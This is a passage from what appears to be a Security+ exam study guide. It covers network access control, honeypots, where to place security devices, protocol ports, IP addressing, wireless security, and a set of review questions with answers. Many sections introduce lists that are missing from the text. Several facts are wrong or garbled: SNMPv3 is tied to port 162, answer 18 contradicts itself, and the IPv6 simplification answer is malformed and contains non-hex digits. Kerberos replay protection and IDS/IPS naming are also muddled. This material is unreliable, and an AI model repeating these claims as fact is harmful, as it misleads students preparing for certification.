If you have a Windows desktop or laptop and you go away on holiday for 2-3 weeks, when you come back your device may need multiple updates. After a remote client has authenticated NAC, it then checks that the device being used is fully patched. See Figure 18:


Figure 18: NAC

When the user is authenticated, the health authority (HAuth) checks against the registry of the client device to ensure that it is fully patched. A fully patched machine is deemed compliant and allowed access to the LAN. In the preceding diagram, Laptop 2 is compliant. If the device is not fully patched, it is deemed noncompliant and is redirected to a boundary network, which could also be known as a quarantine network. The components of NAC are:

Honeypot

When security teams are trying to find out the attack methods that hackers are using, they set up a website similar to the legitimate website with lower security, known as a honeypot. When the attack commences, the security team monitors the attack methods so that they can prevent future attacks. Another reason a honeypot is set up is as a decoy so that the real web server is not attacked. A group of honeypots is called a honeynet.

Exam tip:
A honeypot can be used to examine the attack method that hackers use.

Secure Socket Layer accelerators

Secure Socket Layer (SSL) is used to encrypt data so that when it is in transit it cannot be stolen or altered. SSL encryption is a processor-intensive operation and most servers, such as database servers, are working very hard as it is. SSL acceleration refers to offloading the processor-intensive SSL encryption and decryption from a server to a device, such as a reverse proxy, to relieve the pressure from the server.

SSL/TLS decryptor

When traffic comes into your network from the internet and it is encrypted, the firewall, NIPS, NIDS, DLP, or any network device cannot examine the data. Therefore, after the traffic has passed through the external firewall, the SSL/TLS decryptor will decrypt the data before it passes through an inline NIPS. This then means that the NIPS can examine and prevent malicious traffic accessing the local area network.

Sensor/collector

A sensor/collector can be a device, tap, or firewall log whose purpose is to alert the NIDS of any changes in traffic patterns within the network. If you place your first sensor on the internet side of your network, it will scan all of the traffic from the internet.

Tap/port mirror

A tap or a port mirror is set up on a port of a switch so that when the data arrives at that port, a copy is stored on another device for later investigation or it is sent to a sensor who will investigate the traffic and, if needs be, inform the NIDS of changes in traffic patterns.

DDoS mitigator

A Distributed Denial of Service (DDoS) attack is where a very large amount of traffic is sent to a switch or a server so that it is overwhelmed and cannot function. A DDoS mitigator is a device, such as a stateful firewall on the external interface of your DMZ or a flood guard on an internal switch, that can identify the DDoS attack at an early stage and prevent it from being successful.

Exam tip:
Capturing the data flowing through a port on a switch can be done by port mirroring, also known as a tap.

Segregation/segmentation/isolation

Cyber crime is rife and is the largest growing criminal industry. In today's word, most businesses are interconnected and use the internet. Maintaining the security and integrity of data, including research and development, is paramount. We need to be able to isolate, segment, and segregate our network, both physically and virtually. Let's look at the options we may have:


Figure 19: Two VLANS in a switch

A VLAN is created by using the software on the switch where you can bond a number of ports to work together as a separate logical network. If you look at Figure 19, you can see that port numbers 1-4 have been used to create a VLAN for the IT department, and then ports 20-24 have been used to create another VLAN for the finance department. Although both of these departments are on an internal device, creating the VLANs isolates them from other VLANs and the company's network. An important factor is that a VLAN tag is set up so that when traffic arrives at the switch, it knows where to send it.

Security device/technology placement

It is important for a security or network administrator to understand the functionality that each device provides and where best to place them to ensure that your network is safe. Figure 20 shows the placement of each device:


Figure 20: Security device placement

If we look at Figure 20, the first thing you will notice is that the three network zones that have been established are the LAN, DMZ, and WAN. These networks are divided by two firewalls that are in a back-to-back configuration so that if traffic manages to get through the first firewall, we hope that the next firewall stops it. As resources, such as our website, are in the DMZ, the external firewall may have one or two ports open that the internal firewall between the DMZ and LAN does not.

DMZ device placement

Between the WAN and DMZ there is a network firewall. The purpose of this firewall is to prevent unauthorized access to the network. Directly behind the external firewall is an SSL/TLS decryptor that decrypts the traffic coming in so that other security devices can examine it.

The next stage is that the decrypted traffic is placed through an inline NIPS. As it is inline, all traffic must pass through it. The purpose of the NIPS is as an additional layer of security and should be placed close to the external firewall.

Behind the NIPS is the NIDS in passive mode, where traffic does not travel through it but it is scanning the network for changes in traffic patterns. The NIPS in the DMZ scans the network and also has sensors/collection places in the DMZ to alert it to changes in traffic patterns.

LAN device placement

The firewall dividing the DMZ and the LAN will be a stateful firewall that will prevent DDoS attacks and knows of the acceptable commands used by each application. Directly behind the firewall will be another inline NIPS examining the traffic as it comes into the LAN. Another NIDS and a set of sensors/collectors are placed in the LAN.

The internal switch connects all of the internal devices, and it will be a managed switch using 802.1x so that it authenticates all devices connecting to the network and stops unauthorized devices and rogue WAP from connecting the to the network. The switch will have a flood guard installed to prevent DDoS and MAC flooding attacks. The switch may have a port mirror installed on one of the ports so that a copy of the traffic, stored on backup device for later investigation, is sent to a sensor. Should the sensor identify anything abnormal, it will notify the NIDS in the LAN. A port mirror is also known as a tap.

Aggregation switches

Depending on the number of users that reside in your LAN, you may need several switches to be operating, and these switches need to move traffic between each other. Therefore, rather than having a daisy chain, which would take more time to move the traffic around, we install an aggregation switch. The aggregation switch connects multiple switches in a mode called link aggregation:


Figure 21: Aggregation switch

Link aggregation is a way of joining Ethernet links together so they act like a single, logical link. If you connect all of the switches together, you can balance the traffic among these links to improve performance. An important reason for using link aggregation is to provide fast and transparent recovery in case one of the individual links fails.

Implementing secure protocols

A protocol is the rules required by different applications for the exchange of data where the application can perform actions such as running commands on remote systems, sending and receiving email, or maybe downloading files from the internet. Each application has a special port number it uses for communication. If you think of ports as being TV channels, if we want to watch sport we go to the sports channels, if we want to watch news we go to the news channel. Applications are the same; if we want to send an email, we use a mail application, and they all have a distinct port number for communication.

There are two types of ports: Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). The main difference between the two is that the TCP is connection-orientated as it uses a three-way handshake, and UDP is faster but less reliable as it is connectionless. See Figure 22 for the three-way handshake:


Figure 22: Three-way handshake

In a three-way handshake, the first packet that is sent is called a SYN packet, where the sending host informs the receiving host of the number of its next packet. The receiving host sends a SYN-ACK packet where it says what its next packet is. The Ack packet acknowledges both, and then the data is sent. The data is sent in chunks, and where it is received, an acknowledgement is sent that tells the sending host to send more packets. Once all of the data is sent, a three-way handshake confirms all of the data is intact and the session closes.

In a UDP session, the application is responsible for ensuring that everything is received, and because a three-way handshake is not used, the connection is faster but less reliable. You would use UDP for streaming video, where speed is paramount.

For the purpose of the Security+ examination, you will need to know when to choose the correct protocol and which port it uses. A list of common protocols is listed here with their uses afterwards.

As most protocols use TCP ports, I will only mention the UDP ports and therefore you can assume if it is not labelled UDP, it is TCP.

Exam tip: Knowing why we use each protocol is more important than knowing the port numbers. There will be a review at the end of the book testing port numbers.

Protocol

UDP

Port

Use

File Transfer Protocol (FTP)


21

File transfer—passive FTP

Secure Shell (SSH)


22

Run remote command—securely

Secure Copy Protocol (SCP)


22

Secure copy to UNIX/LINUX

Secure FTP (SFTP)


22

Secure FTP download


Telnet


23

Run remote command—unsecure

Simple Mail Transport Protocol (SMTP)


25

Transport mail between Mail Servers

Domain Name System (DNS)

UDP

53

53

53

Host name resolution

Zone transfer

Name queries

Dynamic Host Configuration Protocol (DHCP)

UDP

67/68

Automatic IP address allocation

Trivial File Transfer Protocol (TFTP)

UDP

69

File transfer using UDP

Hypertext Transport Protocol (HTTP)


80

Web browser

Kerberos


88

Microsoft authentication using tickets

Post Office Protocol 3


110

Pull mail from mail server, no copy left on mail server

NETBIOS

UDP

137-139

NETBIOS to IP address resolution

Internet Message Access Protocol (IMAP 4)


143

Pull mail from mail server

Simple Network Management Protocol (SNMP)

UDP

161

Notifies the status and creates reports on network devices

Simple Network Management Protocol Version 3 (SNMP v3)

UDP

162

Secure version of SNMP

Lightweight Directory Access Protocol (LDAP)


389

Stores X500 objects, searches for active directory information

Lightweight Directory Access Protocol Secure (LDAPS)


636

Secure LDAP where the session is encrypted

Secure Internet Message Access Protocol (IMAP 4)


993

Secure IMAP4

Secure Post Office Protocol 3


995

Secure POP3

File Transfer Protocol Secure (FTPS)


989/990

Download of large files securely

Remote Desktop Protocol (RDP)


3389

Microsoft remote access

Session Initiated Protocol (SIP)


5060/5061

Connects internet based calls

Secure Real Time Protocol (SRTP)


5061

Secure voice traffic

Use case

A Use Case is where everyone in a company tries to achieve a goal. An example would be if you called a company, their customer services take your order, their finance department processes the payment, production would make the product, and then dispatch would mail it to you. Another way of looking at use cases is that they are an example of how something is used. In the following examples, we will see use cases for different protocols.

File transfer – use case

Transferring files is a common function. When we purchase an e-book, it is immediately available to download onto our Kindle. There are four different protocols that we can use for file transfers:

Exam Tip:
SSH is a secure method of running a command on a router.

Remote access – use case

There are various ways of obtaining remote access, we are going to look at each in turn, and decide when we would choose to use them:

Email – use case

There are different types of email, some are web-based and some use the MAPI client on the desktop, Let's look at each of them and understand when we would use them:

An easy way to remember the port number for IMAP4 is to pretend the first letter of IMAP is number 1. Then take the last figure, which is 4, for the second digit, and then take 1 from 4 to get for to get 3 for your third digit, giving you 143 the actual port number.

Name resolution – use case

There are two types of name resolution: hostname resolution, which is the most common, and NETBIOS, which is a legacy name resolution that is very rarely used.

Hostname

The most common form of name resolution is that hostname resolution that comprises of a database of hostnames to IP addresses called DNS that uses a flat file called the hosts file:

Example: A user would like to visit the website of http://ianneil501.com; to get there, they would enter www.ianneil501.com in their web browser as per Figure 23. The hostname resolution follows a strict process:


Figure 23: Hostname resolution

In Figure 23, the hostname resolution adopts a strict process and takes the first entry for that hostname no matter whether it is right or wrong, this is a pitfall of the process. Let's look at this process starting with the DNS Cache:

DNSSEC

To prevent someone poisoning DNS records, DNSSEC was introduced to protect the DNS traffic. Each DNS Record is digitally signed, creating an RRSIG record to protect against attacks assuring you that they are valid and their integrity has been maintained.

Exam tip:
DNSSEC produces a RRSIG record for each host.

NETBIOS

NETBIOS is a Microsoft legacy naming convention that has a flat namespace of a maximum of 15 characters with a service identifier. Each computer name has three separate entries in its database, called WINS and it uses a flat file, called the LMHosts file.

The entry for PC1 as a WINS database would be:

Web – use case

The majority of people use the internet to make purchases and research information, so it is important that we know what the protocols used when accessing websites are:

Voice and video – use case

In the past, when companies wanted meetings, such as a sales meeting, a date was set and the salespeople kept their schedule open, travelling to the location of the meeting the night before and booked themselves into a hotel. This was very costly and time-consuming; nowadays we use videoconferencing where everyone connects to the meeting, does not have to travel, and can free their schedule, making them more productive. In the Security+ exam, we need to be able to understand which protocols are used. There are three main protocols and these are:

Exam tip:
Voice traffic should be placed in its own VLAN to ensure reliability.

Network address allocation – use case

If you have a network with 10,000 computers and every morning you needed to manually insert an IP address into the machine, it would be very time-consuming and there would be a very high chance that you would insert a typo and the IP address would be incorrect. There are two different IP addressing schemes: IP Version 4 and IP Version 6. Let's look at each of these in turn.

IP version 4

The format of an IP Version 4 address is dotted decimal notation, comprosed of four octets making it 32-bit addressing, for example 131.107.2.1. The IP address class is taken by looking at the number on the left-hand side. The last digit on the right-hand side cannot be a zero as it is the network ID, and cannot end in a 255 as this is the broadcast ID.

The Network ID is like a zip code; one person cannot have a zip code used by multiple people. The broadcast ID is used to send traffic to all hosts, therefor, we cannot use an IP address that ends in a zero or 255.

There are public addresses that you can lease and private addresses that are free, but can only be used internally. If you have a banger car, you can drive it around private land all day long, but as soon as you put it on a public road without any insurance, if you were caught by the police, they would impound the car. Private IP addresses can operate internally, but the routers on the internet will drop any private IP packets. There are three private IP address ranges:

Each IP Version 4 client needs an IP address and a subnet mask whose job is to determine whether the packet delivery is local or remote. If the packet is for a remote address, then the client needs to be configured with a default gateway; the router interface on the LAN. If the client does not have a default gateway, then it is restricted to communicating on the local network. There are two appendices at the back of this book on subnetting and CIDR notation.

IP Version 4 addresses are allocated on a regional basis throughout the world:

Registry

Area covered

Afrinic

Africa area

Apnic

Asia/pacific region

Arin

Canada, USA, and some Caribbean islands

Lacnic

Latin America and some Caribbean islands

Ripe NCC

Europe, the middle east, and Central Africa

The automatic way of allocating IP addresses is to use a server called the Dynamic Host Configuration Protocol (DHCP) server. This is a server with a database of IP addresses that can allocate to requesting hosts; there is a four-stage process and it is known as D-O-R-A.

IP version 4 – lease process

IP version 4 lease process – troubleshooting

A DHCP client will not always obtain an IP address because maybe it cannot connect to the DHCP server. An unlikely reason is that the address pool is exhausted; in that case, the local machine will allocate an Automated Private IP Address (APIPA) starting with 169.254.x.x. This is an excellent aid to troubleshooting, as it lets the network engineer know that the client cannot contact the DHCP server. There are many reasons that this happens, so let's look at the DHCP process:


Figure 24: DHCP process across subnets

If the DHCP client is on another subnet, it can cause some problems:

IP version 6 addressing

IP Version 6 addresses are in a colon-hexadecimal format and comprise 8 blocks of 4 digits, making it a 128-bit address. The first 64 bits from the left-hand side are the routing or network portion, and the last 64 bits will be used for the host. There are different address ranges and the main three are:

Example 1: We have an IP Version 6 address of 2001:ABCD:0000:0000:0000:0000:1230:0ABC that we want to simplify, in this case we will remove only the leading zeros:

You will notice that we have replaced four blocks of zeros with double colons. We need to count the remaining blocks and since there are four, we know that four blocks are missing.

Example 2: We have an IP Version 6 address of 2001:ABCD:0000:0000:ABCD:0000:1230:0ABC that we want to simplify. In this case, we will remove only the leading zeros:

You will notice that this is trickier as there are blocks of zero in two places, but we replace the first blocks of zeros with the double colons, and then if we have further blocks of zeros, we replace each of these with :0:. In the example, we count only six blocks, therefore we know we have only two blocks of zeros.

Subscription services – use case

In the past, the traditional method for purchasing application software was to purchase the application on a DVD from a local store or wait 3-4 days for it to be delivered from Amazon. At that time, you would have to pay $300—$400 for the software. With the evolution of the cloud, there is now a tendency to obtain your applications through subscription services, where you pay a monthly fee and can download the application immediately. Two examples of this are:

Routing – use case

The purpose of a router is to connect networks together, whether it be internal subnets or external networks and route packets between them. A router sits at layer 3 of the OSI Reference Model, where the data packets are known as IP packets, as Layer 3 of the OSI deals with IP addressing and delivery.

If we look at Figure 25, we can see five different routers that connect networks between New York, Dublin, Paris, London, and Edinburgh:


Figure 25: Routing packets.

If we think of these routers as post offices delivering mail, it may make it easier to understand. If mail arrives at the Paris post office, the people working there have two sacks, one for Dublin and the other for London; they just need to know where to send the mail next. They cannot have sacks for every destination in the world, it is just not feasible.

Example: If mail arrives at the Paris post office and it is destined for Edinburgh, the post office staff know that they just need to put the mail in the London sack. Once the mail arrives in London, there will be two different sacks, one destined for Edinburgh and the other destined for Paris. The workers know to place the mail for Edinburgh in the Edinburgh sack. If they receive mail for New York, they know to place it in the Paris sack.

Routing packets is no more difficult than moving mail around the world; the router has many routes in a routing table and knows the next hop for packet delivery.

Several protocols are used in the management and control of IP packets going through the router:

Time synchronization – use case

Time is vital for SIEM systems so that events can be placed in chronological order, and for Kerberos as it uses USN and timestamps to prevent replay attacks. In a modern network, the domain controller is synchronized with a time server or the atomic time clock, also known as a reference time source. Stratum has three main types of time servers:


Figure 26: Time synchronization.

From the diagram, you can see that the Stratum 0 time server is the external time server and the internal Stratum 1 time server will synchronize with Stratum 0. A domain controller or SIEM server will synchronize their times with either Stratum 1 or 2.

Exam tip:
A Stratum 0 time server is the ultimate authority in a Stratum timeserver environment. It is the atomic clock that time should be synchronized with.

Directory services – use case

Directory services hold accounts for users, groups, and objects, such as printers, and they store these objects in the International Telecommunications Union (ITU) X500 objects format. There are only three main objects:

Example: If I have a user called Ian who works in the IT department within a domain called ianneil501.com, the distinguished name in an X500 format starts at the bottom of the structure going left to right:

cn=Ian, ou=IT, dc=ianneil501, dc=com

The user is a common name, the IT department is an OU, and ianneil501.com is the domain that is in two distinct portions.

Active Directory

Microsoft's Active Directory is a very common directory service and we are going to look at the components and protocols used:

Example: LDAP is the same as a shopkeeper who sells shoes. When a delivery arrives, the shoes are unloaded and stored at the back of the shop. When a customer arrives and cannot see the size they want, they ask the shopkeeper, who goes to the storeroom to find the shoes.

When a systems administrator opens up a wizard in Active Directory and creates a user account, LDAP creates and stores objects in an X500 format. If the administrator has 10,000 users and needs to find a user, they use the search facility and LDAP brings back the result of the search:

Each update to an Active Directory object is done by giving the change an Updated Sequence Number (USN). For example, the next change must be USN 23 and the change after that is USN 24, and it is stamped with the time it happens, which is known as being timestamped.

All computers in an Active Directory domain must have their time synchronized to be within five minutes of the domain controller. A replay attack is where a man-in-the-middle attack is performed and the information is altered and replayed at a later date.

Due to Kerberos having each with a different update number, called a USN and timestamps, it will prevent a replay attack. Replay attacks are interception attacks that replay data at a later date, but the Kerberos traffic will not be sequential, and when this happens the replayed data will be rejected.

Exam tip:
Ensure you know the secure version of all of the protocols.

Switching – use case

A switch is an internal device that connects all of the users in the LAN so that they can communicate with each other. As we have seen in previous chapters, a computer connects to a wall jack into a patch panel, and then from the patch panel to the switch. Let's look at the functionality and protocols used by a switch:

Simple network management protocol – use case

Networks are very large and have many different devices; there needs to be some sort of monitoring software to ensure that the devices are still functioning. We use two different versions of SNMP:

Implementing wireless security

Wireless communication is now part of everyday life, from using 4G on your mobile phone to access the internet to using Bluetooth to listen to your music as you walk down the road. However, if your wireless device is unsecure, it can lead to data loss and maybe someone stealing funds from your bank account. Let's first look at the different types of wireless networks:

Exam tip:
A guest wireless network give contractors access to the internet, it could also be used by employees at lunchtime.

Wireless access points – controllers

Wireless access points help extend the wireless network and there are two different types of controllers:

Exam tip:
A thin controller is used to manage multiple wireless access Points remotely.

Securing access to your wireless access point

Without the use of encryption, there are three simple methods for securing access to your wireless access point:


Figure 27: SSID


Figure 28: MAC filtering

Wireless bandwidth/band selection

There are different wireless standards, and we need to know the limitations of each. The band selection is also known as the frequency:

Standard

Frequency

Speed

Remarks

802.11 a

5 GHz

54 Mbps

5 GHz channel bandwidth is 40 MHz

802.11 b

2.4 GHz

11 Mbps

2.4 GHz channel bandwidth is 20 MHz

802.11 g

2.4 GHz

54 Mbps


802.11 n

2.4 GHz/5Hz

150 Mbps

MIMO—multiple input multiple output and travels the furthest distance

Wireless channels

In the Security+ exam, the wireless channels go from channel 1 up to channel 11, and the device placement should be:

We place the devices as far apart as possible to prevent overlap of adjacent channels and interference. Wireless devices can suffer interference from elevators, baby monitors, cordless phones, metal racking, and load-bearing walls.

Wireless antenna types and signal strength

There are three main antenna types:


Figure 29

Wireless coverage

One of the security implications of having a wireless network is to ensure that wireless networks will have coverage that will give access to resources in a timely fashion without the coverage being extended outside of the companies' boundaries where it could be hacked. Let's look at each of these in turn:

Exam tip:
If my newly installed WLAN is not fully functional, we may not have carried out the site survey properly.

Wireless encryption

So that we can secure our wireless network, we need to choose a form of encryption, ranging from WEP, which is the weakest, to WPA2—CCMP, which is the strongest. Let's look at each of these in turn:

Wireless – open system authentication

If we want to set up a wireless network for the general public to access without any encryption or any passwords, we could use the Open System Authentication but the users would have to access the WAP at their own risk.

Wireless – WPS

When we access our wireless network or gaming console, we may use WPS where the password is already stored and all you need to do is to press the button to get connected to the wireless network.

Wireless – captive portal

When you join the wireless network at the airport, you are connected to the free Wi-Fi yet you cannot access the internet right away. It redirects you to a captive portal where you need to enter your email address, put in your Facebook credentials, or pay for the premium wireless network.

Wireless attacks

There are two main types of attacks relating to wireless networks:

Wireless authentication protocols

There are numerous wireless authentication protocols:

Review questions

  1. What is the lowest layer of the OSI reference model does a switch operate?

  2. What layer of the ISO does a router operate?

  3. Which layer of the OSI Reference Model does a VLAN operate?

  4. On which layer of the OSI Reference Model does a Web Application Firewall work?

  5. What is the purpose of a Web Application Firewall and where is it normally placed?

  6. What is the default setting for a firewall?

  7. What is implicit deny and which two devices does it affect?

  8. If traffic is not arriving at my VLAN, what should I do?

  9. Which port type is connection-orientated and why?

  10. Which type of port would I use for streaming video?

  11. What is the firewall that does content filtering, URL filtering, and malware inspection?

  12. Which network device connects two networks together?

  13. Which type of internal device connects users on the same network?

  14. Which type of device hides the internal network from hackers on the internet?

  15. What is an inline NIPS?

  16. Which type of IPD protects virtual machines from attack?

  17. Which type of IDS is placed behind the firewall as an additional layer of security?

  18. If I don't have a NIDS on my network, which device can passively monitor network traffic?

  19. What is the difference between a signature—and anomaly-based NIDS?

  20. What is the passive device that sits on your internal network?

  21. If I receive an alert that Server 1 has a virus and I inspect the server and there are no viruses, what is this known as?

  22. How can I prevent someone from accessing the medical center's network by plugging their laptop into a port in the waiting room?

  23. How can I prevent someone from plugging a rogue access point into my network?

  24. How do 802.1x and port security differ? Which one gives me more functionality?

  25. Which device can be installed on a switch to prevent a DDoS attack?

  26. Which is the purpose of web caching on a proxy server?

  27. Which type of proxy verifies that the request is valid before web caching?

  28. What is the purpose of a VPN?

  29. What happens in the IKE phase of a VPN session?

  30. What is the purpose of a VPN concentrator?

  31. What is the most secure VPN tunneling protocol?

  32. What type of VPN uses SSL certificates?

  33. How many keys does symmetric encryption use and what are the benefits over asymmetric encryption?

  34. What modes would you use a L2TP/IPSec tunnel over the internet and then internally?

  35. Which VPN session type would you use on a site-to-site VPN?

  36. What network device should you use to manage a high volume of web traffic?

  37. How does active/passive clustering work?

  38. What type of network is used by a virtual network so that the route requests are forwarded to a controller?

  39. How should I set up my voice traffic so that I can control the bandwidth across my internal network?

  40. What is the purpose of a Demilitarized Zone (DMZ) and what type of web server is located there?

  41. What is the difference between NAT and PAT?

  42. If I want to find out what attack methods a potential hacker is using, what do I need to set up?

  43. What is the purpose of network access control? Name the two agents that is uses.

  44. What type of network device would check that there is no spam before the mail is delivered to the internal mail server?

  45. What type of device can be used to automate the collection of log files across many different devices?

  46. If I wanted to back up data to a backup device but at the same time prevent someone from deleting the data, what device do I need to use?

  47. What can be used to ensure that someone cannot steal sensitive data by using a USB flash drive or emailing the data to their personal email account?

  48. What is a port mirror that could also be called a tap?

  49. Which protocol should I use to download very large files from the internet?

  50. Which email client does not retain a copy on the mail server?

  51. What type of records are created by DNSSEC?

  52. When my Windows DNS server is not available, which Linux server could I use for name resolution and which port number does it use?

  53. What is the protocol used for UDP ports 5060/5061?

  54. Which ports does NETBIOS use?

  55. If I want to access information from Active Directory securely, which protocol and port should I use?

  56. If I want to run a command securely on a CISCO router, which protocol and port should I use?

  57. Which secure protocol should I use to find out a report on the utilization of network devices?

  58. What are the two portions of an IPSec packet?

  59. Which authentication protocol can prevent replay attacks and how?

  60. How can I tell whether my laptop fails to get an IP address from a DHCP server?

  61. What type of IP address is 2001:123A: 0000:0000: ABC0:00AB:0DCS:0023 and how can we simplify it?

  62. Describe subscription services.

  63. What type of wireless network does not use a WAP to connect two devices together?

  64. What is the strongest version of wireless encryption?

  65. Which Stratum time server is the atomic time server or reference time source?

  66. If I disable SSID broadcasting from my wireless router, which two methods can I use to discover the SSID?

  67. I have just installed a new tablet onto my network and it still cannot access the WAP. Other users can connect easily, I have checked the encryption types and login details and they are correct. What stage has been missed?

  68. What type of wireless controller will allow me to administer seven WAPs?

  69. What is the benefit of installing an omnidirectional antenna?

  70. What could be a problem with installing a directional antenna?

  71. What type of wireless method uses a password to connect to the WAP?

  72. If I own a coffee shop and want to provide a wireless network for my customers that does not require any administration from my side, how should I set it up?

  73. I have joined the wireless network at the airport, but I cannot connect to the internet. What is preventing this?

  74. What type of wireless authentication protocol is encapsulated inside PEAP?

  75. Why should I not use PAP?

Answers and explanations

  1. Layer 2 of the OSI Reference Model is the lowest layer. The data-link layer is the lowest layer that a switch operates at.

  2. A router works at Layer 3 of the OSI Reference Model as it works on IP addresses.

  3. A VLAN is created on a switch that works at layer 2 of the OSI Reference Model.

  4. A Web Application Firewall works at Layer 7 of the OSI Reference Model.

  5. The web application firewall is normally installed on a web server as its job is to protect web applications from attack.

  6. The default setting for a firewall is block all, allow by exception.

  7. Implicit deny is used by both the firewall and the router where the last rule is deny all. Should there not be an allow rule, then the last rule applies and it is known as implicit deny.

  8. If the VLAN traffic is not arriving, check that the VLAN tag is set up properly as it tells the VLAN traffic where to go.

  9. A TCP Port is connection-orientated as it uses a three-way handshake to set up the session. It also acknowledges when the packets arrive.

  10. A UDP port would be used for streaming video as it is connectionless and faster than TCP.

  11. The Unified Threat Management (UTM) is a firewall that provides value for money as it can provide URL filtering, content filtering, malware inspection, as well as the firewall functionality.

  12. A router connects different networks together and works at layer 3 of the OSI Reference Model.

  13. Users on the same network are usually connected together using a switch on a star topology.

  14. A Network Address Translator (NAT) hides the internal network from those on the external network.

  15. An inline NIPS is where the incoming traffic passes through and is screened by the NIPS.

  16. A Host-based IPS (HIDS) is installed inside the guest virtual machine to protect it from attacks.

  17. A network-based IPS (NIPS) is placed behind the firewall as an additional layer of security. The firewall prevents unauthorized access to the network.

  1. If there is no NIDS on the network, the NIPS can passively monitor the network as it can fulfill the functionality of a NIPS even though is it not known as passive.

  1. A signature-based NIDS works off a known database of variants, whereas the anomaly-based one starts off with the database and can learn about new patterns or threats.

  2. A passive device that sits inside your network is a NIDS.

  3. If one of the monitoring systems reports a virus and when you physically check and find no virus, this is known as a false positive.

  4. If we enable port security, where we turn the port off on the switch, it will prevent further use of the wall jack.

  5. To prevent a rogue access point attaching to your network, you would enable 802.1x on the switch itself. 802.1x ensures that the device is authenticated before being able to use the post.

  6. A managed switch uses 802.1x that authenticates the device but does not disable the port when port security merely disables the port. If we keep disabling the ports on a switch, it loses functionality.

  7. A flood guard can be installed on a switch to prevent DDOS attacks.

  8. Web caching on a web server keeps copies of the web pages locally, ensuring faster access to the web pages and preventing the need to open a session to the internet.

  9. A non-transparent proxy ensures that all requests are validated before being carried out.

  10. The purpose of a VPN is to create a tunnel across unsafe networks from home or a hotel to the workplace.

  11. In the IKE phase of an IPSec session Diffie Hellman using UDP Port 500 sets up a secure session before the data is transferred.

  12. The purpose of a VPN concentrator is to set up the secure session for a VPN.

  13. The most secure VPN tunnel is L2TP/IPSec, which uses AES encryption for the ESP.

  14. An SSL VPN is the only VPN to use SSL certificates.

  15. Symmetric encryption only uses one key to encrypt and decrypt and can encrypt larger amount of data than asymmetric encryption, which uses two keys.

  16. L2TP/IPSEC should be used in Tunnel Mode across the internet or external networks, and in Transport Mode internally.

  17. When setting the Site-to-Site VPN, it should be used in always-on mode as opposed to dial on demand.

  1. A load-balancer should be used to manage a high volume of web traffic as it sends the requests to the least-utilized node that is healthy.

  1. Both the active and passive node share the same quorum disk, the passive node polls the passive node and when the active node fails, the passive node takes over.

  2. SDN are used in a virtual environment when the routing requests are forwarded to a controller.

  3. A voice VLAN should be set up to manage the flow of voice traffic, isolating it from the rest of the network.

  4. The DMZ is a boundary layer that hosts an extranet server, it is sometimes known as the extranet zone.

  5. A NAT is one internal connection to one external connection that hides the internal network. PAT is multiple internal connections to one external connection.

  6. IF you setup a honeypot, which is a web site with lower security, you will be able to monitor the attack methods being used and then be able to harden your actual web server against potential attacks.

  7. Network access control ensures that devices connecting to your network are fully patched. There are two agents: one that is permanent and the other than is dissolvable that is for a single use.

  8. A mail gateway can be placed on the network before the mail server to prevent spam getting to the mail server.

  9. A SIEM server can correlate log files from many devices and notify you of potential attacks.

  10. If data is backed up to a WORM drive write-once read-many, the data cannot be deleted or altered.

  11. Data Loss Prevention (DLP) prevent sensitive data being emailed out or taken from a file server using a USB drive.

  12. A port mirror is when a copy of the data going to a port on a switch can be diverted to another device for analysis, this is also called a tap.

  13. FTPS that uses TCP ports 989/990 can download very large files quickly.

  14. POP3 downloads the complete email and does not retain a copy on the mail server.

  15. DNSSEC creates RRSIG records for each DNS host and a DNSKEY record used to sign the KSK or ZSK.

  1. When a windows DNS Server is not available, host-name resolution can be carried out by a Linux/UNIX Bind server, as it does host name resolution it uses the port 53.

  2. Session Initiated Protocol (SIP) that establishes the interconnection for voice traffic uses UPD Ports 5060/5061.

  3. NETBIOS uses UDP ports 137-139 and also a flat file called the LMHosts File.

  4. LDAPS TCP port 636 accesses Active Directory information securely.

  5. Secure shell (SSH) is used to run remote commands on a router.

  6. SNMPv3 is the secure version of the simple network management protocol that collects reports and statistics from network devices.

  7. An IPSec packet has the authenticated header that uses either SHA1 or MD5, and an Encapsulated Payload (ESP) that uses DES, 3DES, or AES.

  8. Kerberos is an authentication protocol that uses Updated Sequence Numbers (USN) and timestamps to prevent replay attacks. It is also the only authentication protocol that uses tickets.

  9. If you cannot get an IP address from a DHCP server, you would receive a 169.254.x.x IP address.

  10. It is an IP Version 6 address and you can simplify it by removing the leading zeros to 2001:123A:ABC0:AB:DCS:23.

  11. Subscription Services is where software is leased, for example, Office 365 where you get not only email but office packages as well.

  12. An ad hoc wireless network allows two devices to connect without a WAP.

  13. The strongest version of wireless encryption is WPA2-CCMP as it uses AES.

  14. The Stratum 0 is the ultimate time source, Stratum 1 requests to synch time with it.

  15. A wireless packet sniffer or an SSID De-cloak device can discover the SSID even if the SSID broadcast has been disabled.

  16. When connecting a new network device but every seemed to be right it could be that the MAC address has now been added to MAC filtering.

  17. A thin wireless controller can control multiple WAP remotely.

  18. An omnidirectional antenna broadcasts the signal in all directions.

  19. A directional antenna only broadcasts in one direction, therefore if it is pointing in the wrong direction, the users will not be able to connect to the network.

  20. PSK is a method to connect to the wireless network using the WAP password.

  21. Open System Authentication allows the public to connect to the WAP without any authentication.

  22. In this scenario, the user has connected to the Captive Portal at the airport, which may need your email address, Google account, or Facebook account to connect to the free Wi-Fi network.

  23. EAP is incorporated inside a PEAP authentication protocol.

  24. PAP shows the password in cleat text, making it very insecure.

Understanding Cloud Models and Virtualization

In this chapter, we will be learning about the deployment and security issues of virtualization. We will get acquainted with the deployment and storage environments of the cloud models. We will also learn about different scenarios to learn when to use on-premises, hosted, and cloud environments.

We will cover the following exam objectives in this chapter:

Cloud computing

The demand for cloud services has risen in recent years as the workforce has been more mobile; the cloud solution is very cost-effective and maintains the high availability of systems. Before you decide to move to a cloud service provider (CSP), you need to ensure that you trust them 100%.


This module will look at different cloud models, coupled with cloud storage and how machines in the cloud are created. There are many good reasons why cloud computing has become popular:

When they move to the cloud, they just roll out one image and the CSP clones it so they don't need to reimage each laptop. Today, they are delivering Word 2016, therefore the cloud machines need an i5 processor with 4 GB of RAM for 2 days. They go to a CSP and lease the hardware specification that they need.

The next week, in another location, they will deliver Skype for Business, so there is no need to reimage the laptops but they now leave quad i7 processors with striped disk sets and 64 GB of RAM. The course is now for 5 days, so it is longer and more expensive. The image is uploaded and the cloud machines are upgraded, resulting in a much higher cost as they are using more resources. They do not need to purchase the additional hardware and the setup is more cost-effective.


